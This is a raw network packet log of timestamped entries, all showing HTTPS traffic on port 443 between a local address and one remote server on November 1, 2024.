Nov 1, 2024 20:58:33.887701988 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.887702942 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.887893915 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893337011 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.893394947 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.893547058 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893547058 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893610954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893610954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893610954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893646002 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.893677950 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.893837929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898228884 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.898296118 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.898452997 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898452997 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898513079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898514032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898514032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898514032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.898550034 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.898770094 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903583050 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.903639078 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.903794050 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903795004 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903856993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903856993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903856993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.903891087 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.903918028 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.904062986 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908562899 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.908613920 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.908771992 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908771992 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908822060 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908822060 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908822060 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908822060 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.908857107 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.909045935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914026022 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.914079905 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.914216995 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914216995 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914266109 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914266109 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914305925 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.914328098 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.914556980 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.918771982 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.918818951 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.918992996 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.918992996 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.919055939 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.919055939 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.919085026 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.919116974 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.919279099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923613071 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.923660040 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.923842907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923842907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923842907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923842907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923913002 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.923943043 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.923943043 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.924146891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.929145098 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.929194927 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.929374933 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.929374933 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.929434061 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.929470062 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.929470062 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.929645061 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.933635950 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.933712006 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.933828115 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.933828115 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.933888912 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.933888912 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.933928967 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.933958054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.934118032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.937885046 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.937943935 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.938101053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938101053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938180923 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938180923 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938180923 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938182116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.938239098 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.938433886 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942470074 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.942528009 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.942708969 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942708969 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942708969 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942773104 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.942811012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942811012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.942996979 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947499990 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.947557926 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.947695971 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947695971 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947746992 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947747946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947788000 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.947823048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947823048 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.947985888 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.951556921 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.951637983 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.951808929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.951808929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.951808929 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.951879978 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.951915979 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.951915979 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.952075005 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.956594944 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.956651926 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.956799984 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.956885099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.956885099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.956932068 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.957237005 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961067915 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.961127043 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.961282015 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961282015 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961330891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961330891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961330891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.961360931 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.961570024 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965352058 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.965409994 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.965576887 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965576887 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965640068 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965640068 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965640068 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965675116 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.965706110 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.965872049 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969197989 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.969257116 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.969419956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969419956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969477892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969479084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969479084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969512939 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.969541073 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.969707012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973349094 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.973406076 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.973607063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973607063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973607063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973663092 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.973705053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973705053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.973901033 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.978203058 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.978261948 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.978420019 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.978499889 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.978533030 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.978727102 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.981992960 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.982073069 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.982228994 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.982229948 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.982229948 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.982294083 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.982328892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.982328892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.982525110 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.986021996 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.986080885 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.986277103 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.986339092 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.986363888 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.986365080 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.986670017 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.989782095 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.989842892 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.989960909 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.990051031 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.990113020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.990153074 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.990309000 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.993793011 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.993851900 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.993974924 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.993976116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.994024038 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.994041920 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.994041920 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.994185925 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.994232893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.997631073 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.997704029 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.997817993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.997817993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.997872114 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.997936964 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.998023033 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001291037 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.001346111 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.001516104 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001516104 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001516104 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001516104 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001584053 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.001612902 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.001734018 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.005418062 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.005474091 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.005773067 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.005773067 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.005820036 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.006064892 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.008814096 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.008868933 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.009001017 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.009001017 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.009056091 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.009088039 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.009114027 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.009114027 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.009327888 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.012368917 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.012424946 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.012597084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.012597084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.012658119 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.012690067 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.012690067 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.012866020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.015754938 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.015810013 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.015944004 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.016026974 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.016068935 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.016097069 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.016216993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.019567013 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.019622087 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.019783020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.019783020 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.019844055 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.019876957 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.019876957 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.020080090 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.022902966 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.022963047 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.023082972 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.023127079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.023127079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.023127079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.023168087 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.023217916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.023350954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027157068 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.027210951 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.027337074 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027337074 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027412891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027412891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027412891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027412891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027412891 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027456999 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.027506113 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.027645111 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.031379938 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.031450987 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.031585932 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.031585932 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.031646013 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.031753063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.031784058 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.034693956 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.034764051 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.034930944 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.034930944 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.034981012 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.035007954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.035145998 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.037547112 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.037619114 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.037760973 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.037760973 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.037832975 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.037870884 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.038031101 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040294886 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.040363073 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.040472031 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040524960 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040524960 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040569067 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.040596962 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040596962 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.040759087 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.043714046 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.043782949 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.043891907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.043891907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.043946981 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.043997049 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.043997049 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.044162989 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.046654940 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.046725035 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.046871901 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.046953917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.046955109 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.046994925 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.047154903 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.049552917 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.049618006 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.049830914 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.049830914 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.049885035 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.049915075 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.050103903 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.052508116 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.052577019 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.052742958 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.052742958 CET	58990	443	192.168.11.20	188.245.203.37
